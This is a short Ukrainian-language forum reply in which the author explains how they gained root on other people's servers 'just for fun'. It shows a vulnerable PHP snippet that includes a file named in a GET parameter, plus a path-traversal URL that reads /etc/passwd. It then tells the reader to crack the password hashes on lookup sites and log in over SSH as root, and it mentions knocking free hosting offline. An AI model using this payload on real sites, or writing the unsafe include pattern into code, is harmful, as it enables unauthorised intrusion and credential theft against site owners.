Hanter написав:Що ж в мене питання. Як то можна зайти під рутом не знаючи пассворда?
поперше
и ось хеши паролів. Кожен може бачити. Якщо пароль 123456 -- досвідос усьому. Це примітив. Є витонченіщі методи.
Щодо причин... колись в гуглі таким чином ми шукали горе прогерів зі своїми сайтиками, що дозволяли завантажувати щось, або приймали у GET ім’я файлу. Не уявляєшь скільки таких сайтів з index.php
<?php
echo "<html>";
include("pages/{$_GET['file']}");
echp "</html>";
робимо так: http:/site/index.php?file=../../../../../../../../../../../../../../../etc/passwd
потім на сайтах шукаємо розшифровку хеша (до 8ми символів все все розшивровано) потім ssh під рутом. Просто так, по приколу . Безкоштовний хостинг теж клали. Просто так